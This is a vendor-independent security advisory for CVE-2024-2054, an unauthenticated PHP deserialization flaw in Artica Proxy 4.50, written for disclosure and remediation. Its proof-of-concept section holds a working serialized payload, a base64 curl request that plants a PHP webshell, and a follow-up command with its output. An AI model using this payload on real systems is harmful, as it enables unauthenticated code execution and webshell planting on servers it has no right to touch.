Artica Proxy 4.50 Unauthenticated PHP Deserialization

KL-001-2024-002: Artica Proxy Unauthenticated PHP Deserialization Vulnerability

Title: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
Advisory ID: KL-001-2024-002
Publication Date: 2024.03.05
Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-002.txt

1. Vulnerability Details

   Affected Vendor: Artica
   Affected Product: Artica Proxy
   Affected Version: 4.50
   Platform: Debian 10 LTS
   CWE Classification: CWE-502 Deserialization of Untrusted Data
   CVE ID: CVE-2024-2054

2. Vulnerability Description

   The Artica Proxy administrative web application will deserialize
   arbitrary PHP objects supplied by unauthenticated users and
   subsequently enable code execution as the “www-data” user.

3. Technical Description

   Prior to authentication, a user can send an HTTP request
   to the “/wizard/wiz.wizard.progress.php” endpoint. This
   endpoint processes the “build-js” query parameter by base64
   decoding the provided value and then calling the “unserialize”
   PHP function with the decoded value as input.

   Code snippet from "wiz.wizard.progress.php":

    if(isset($_GET["build-js"])){buildjs();exit;}  
    ...  
    $ARRAY=unserialize(base64_decode($_GET["build-js"]));
   

   To exploit this vulnerability, a user can leverage the
   installed “Net_DNS2” library autoloader to instantiate the
   “Net_DNS2_Cache_File” class. The “__destruct” method
   within this class will write to arbitrary files defined
   by the class:

    public function __destruct()  
    {  
        //  
        // if there's no cache file set, then there's nothing to do  
        //  
        if (strlen($this->cache_file) == 0) {  
            return;  
        }
   
        //  
        // open the file for reading/writing  
        //  
        $fp = fopen($this->cache_file, 'a+');  
        if ($fp !== false) {  
        ...  
        if (!is_null($data)) {
   
            //  
            // write the file contents  
            //  
            fwrite($fp, $data);  
        }
   

   An unauthenticated user can overwrite existing files and
   insert a webshell to execute malicious PHP as the “www-data”
   user.

4. Mitigation and Remediation Recommendation

   No response from vendor. This vulnerability can be remediated
   by deleting the ‘usr/share/artica-postfix/wizard’ directory
   if it is not needed. Otherwise, move it to a location outside
   of the web root.

5. Credit

   This vulnerability was discovered by Jaggar Henry of KoreLogic,
   Inc.

6. Disclosure Timeline

   2023.12.18 - KoreLogic requests vulnerability contact and
   secure communication method from Artica.
   2023.12.18 - Artica Support issues automated ticket #1703011342
   promising follow-up from a human.
   2024.01.10 - KoreLogic again requests vulnerability contact and
   secure communication method from Artica.
   2024.01.10 - KoreLogic mail daemon receives SMTP 554 5.7.1 from
   mail.articatech.com with response
   “Client host rejected: Go Away!”
   2024.01.11 - KoreLogic requests vulnerability contact and
   secure communication method via
   https://www.articatech.com/ ‘Contact Us’ web form.
   2024.01.23 - KoreLogic requests CVE from MITRE.
   2024.01.23 - MITRE issues automated ticket #1591692 promising
   follow-up from a human.
   2024.02.01 - 30 business days have elapsed since KoreLogic
   attempted to contact the vendor.
   2024.02.06 - KoreLogic requests update on CVE from MITRE.
   2024.02.15 - KoreLogic requests update on CVE from MITRE.
   2024.02.22 - KoreLogic reaches out to alternate CNA for
   CVE identifiers.
   2024.02.26 - 45 business days have elapsed since KoreLogic
   attempted to contact the vendor.
   2024.02.29 - Vulnerability details presented to AHA!
   (takeonme.org) by proxy.
   2024.03.01 - AHA! issues CVE-2024-2054 to track this
   vulnerability.
   2024.03.05 - KoreLogic public disclosure.

7. Proof of Concept

   To overwrite the “wiz.upload.php” file to contain a PHP
   webshell, the following serialized object can be base64
   encoded and submitted via the “build-js” query parameter:

O:19:"Net_DNS2_Cache_File":4:{s:10:"cache_file";s:47:"/usr/share/artica-postfix/wizard/wiz.upload.php";s:16:"cache_serializer";s:4:"json";s:10:"cache_size";i:9999999999;s:10:"cache_data";a:1:{s:30:"<?php
system($_GET[‘cmd’]); ?>";a:2:{s:10:"cache_date";i:0;s:3:"ttl";i:9999999999;}}}

    $ ARTICA_URL="https://127.0.0.1:9000"; PAYLOAD_CMD="id"; curl -k   

“$ARTICA_URL/wizard/wiz.wizard.progress.php?build-js=TzoxOToiTmV0X0ROUzJfQ2FjaGVfRmlsZSI6NDp7czoxMDoiY2FjaGVfZmlsZSI7czo0NzoiL3Vzci9zaGFyZS9hcnRpY2EtcG9zdGZpeC93aXphcmQvd2l6LnVwbG9hZC5waHAiO3M6MTY6ImNhY2hlX3NlcmlhbGl6ZXIiO3M6NDoianNvbiI7czoxMDoiY2FjaGVfc2l6ZSI7aTo5OTk5OTk5OTk5O3M6MTA6ImNhY2hlX2RhdGEiO2E6MTp7czozMDoiPD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2bIjthOjI6e3M6MTA6ImNhY2hlX2RhdGUiO2k6MDtzOjM6InR0bCI7aTo5OTk5OTk5OTk5O319fQ%3d%3d”
&& curl -k "$ARTICA_URL/wizard/wiz.upload.php?cmd=$PAYLOAD_CMD";

  {"uid=33(www-data) gid=33(www-data) groups=33(www-data)  
   ":{"cache_date":1696883506,"ttl":8303116493}}

The contents of this advisory are copyright© 2024
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt